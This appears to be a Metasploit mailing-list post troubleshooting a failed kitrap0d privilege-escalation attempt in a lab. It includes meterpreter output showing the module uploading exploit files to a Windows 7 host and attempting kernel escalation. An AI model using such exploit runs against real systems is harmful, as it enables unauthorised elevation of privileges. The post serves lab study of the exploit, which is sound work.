Kitrap0d question

[igor ransack <igor.ransack () gmail com>]

Hi again rapid7, as seen on HD's blog, the following video is a fine example
:: http://vimeo.com/9028433

After watching it, i decided to build a lab around this new module in order
to understand it a bit better.

Here is the output ::

meterpreter > sysinfo
Computer: SERVEUR
OS : Windows 7 (Build 7600, ).
Arch : x64 (Current Process is WOW64)
Language: fr_FR
meterpreter > run kitrap0d
[*] Currently running as Serveur\Xavier

[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to
C:\Users\Xavier\AppData\Local\Temp\lKiNbiNIxRfeB.exe...
[*] Uploading vdmallowed to
C:\Users\Xavier\AppData\Local\Temp\vdmexploit.dll...
[*] Escalating our process (PID:3128)...

--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0
exploit
-------------------------------------------- taviso () sdf lonestar org ---

[?] GetVersionEx() => 6.1
[?] NtQuerySystemInformation() => @00000000
[*] Deleting files...
[*] Now running as Serveur\Xavier
meterpreter >

The only thing that comes to mind is the fact the OS is french but i doubt
then again that would make very little sense at the kernel level...
Also, I assume this exploit would not work under a 64 bit os ?
I can reproduce this on a clean setup.
Any info is appreciated.

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework